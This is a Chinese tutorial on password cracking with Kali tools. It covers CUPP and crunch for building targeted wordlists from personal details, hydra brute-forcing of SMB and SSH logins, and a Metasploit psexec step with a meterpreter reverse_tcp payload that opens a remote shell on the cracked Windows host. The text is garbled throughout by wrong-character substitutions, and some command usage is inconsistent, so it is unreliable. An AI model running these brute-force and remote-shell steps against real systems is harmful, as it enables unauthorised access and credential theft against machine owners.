本文次要设计如下内容
1.CUPP(kali)
2.亦思社会工程学学点生成器
3.一句话明码破解工具
4.crunch(kali)
5.hydra(kali)相干字典和工具可在文末获取百度云下载地址
CUPP(kali)
首先,装置cupp软件
apt install -y cupp新建一个文件夹,用于保留生成的字典
输出 cupp -i 命令开始编辑生成字典
依据本人已知的信息,生成字典。
查看生成的字典 cat san.txt
亦思社会工程学学点生成器
一句话明码破解工具
crunch(kali)
crunch是kali自带的工具,是一种创立明码字典的工具。依照指定的规定生成明码字典,能够灵便的定制本人的字典文件。
首先,先尝试一个简略的命令。如图所示。1 8示意明码是8位 前面的是明码的范畴,咱们能够看出依照这种形式输入的字典有23TB。(切记,运行一下立马暂停,否则会卡死)
查看帮忙
man crunch > crunch.help命令格局
crunch <min-len> <max-len> [<charset string>] [options]参数阐明
min-len 设定最小字符串长度(必选)max-len 设定最大字符串长度(必选)charset string 字符集options-b 指定文件输入的大小,防止字典文件过大-c 指定文件输入的行数,即蕴含明码的个数-d 限度雷同元素呈现的次数-e 定义进行字符,即到该字符串就进行生成-f 调用库文件特殊字符
% 代表数字^ 代表特殊符号@ 代表小写字母, 代表大写字母查看库文件
cat /usr/share/crunch/charset.lst如图所示,后面显示的名称,前面显示的内容是字符集 。这些都是设置好的,咱们也能够自定义写一个字符集。
例子1:生成-1-8位明码字典,字符集合为小写字母,从a开始到zzzzzzzz完结
crunch 1 8
例子2:生成1-6位的明码字典,字符集合为[abcdefg],从a开始到gggggg完结
crunch 1 6 abcdefg
例子3:生成指定字符串,比方生日的日期(%代表数字)
crunch 8 8 -t 199307%% -e 19930730
例子4:生成元素的组合,比方123.com
crunch 7 7 -t %%%.com -s 111.com -e 123.com
例子5:在字典中输入特殊字符
crunch 3 3 abc -t @@@ -l @aa
例子6: 以元素组合生成字典[zhangsan|1993|0701]
crunch 4 4 -p zhangsan 1992 0701
例子6:
自定义字符汇合
vim /usr/share/crunch/charset.lst
创立自定义字符汇合
增加一个字符集
应用自定义字符集生成[*.com] 字典文件
crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com
hydra(kali)
首先,先筹备两个文件:罕用的账号和密码文件。这个是我从github下载的,账号和明码都有几千条。文章最初,我会将文件下载地址分享一下。
windows口令破解
hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr-l 指定一个用户名-p 指定一个明码-P 指定明码字典-L 指定用户名字典-vV 显示爆破细节-o 保留爆破后果-f 找到正确的明码就进行爆破-e n null s same r 反向-t 线程爆破胜利后,咱们应用msf中的use exploit/windows/smb/psexec模块去链接。
建设payload set payload windows/meterpreter/reverse_tcp
查看须要配置的参数 show options
设置指标主机 set RHOSTS 192.168.0.110
设置账号和明码 set SMBPass xxx set SMBUser xxx
run或者exploit进行连贯
linux口令破解
linux口令破解,也分为近程破解与本地破解。近程破解次要是爆破ssh服务,属于在线明码攻打。本地破解须要拿到linux的shadow文件,进行hash值破解,属于离线明码攻打。
破解ssh服务
hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64本文由mdnice多平台公布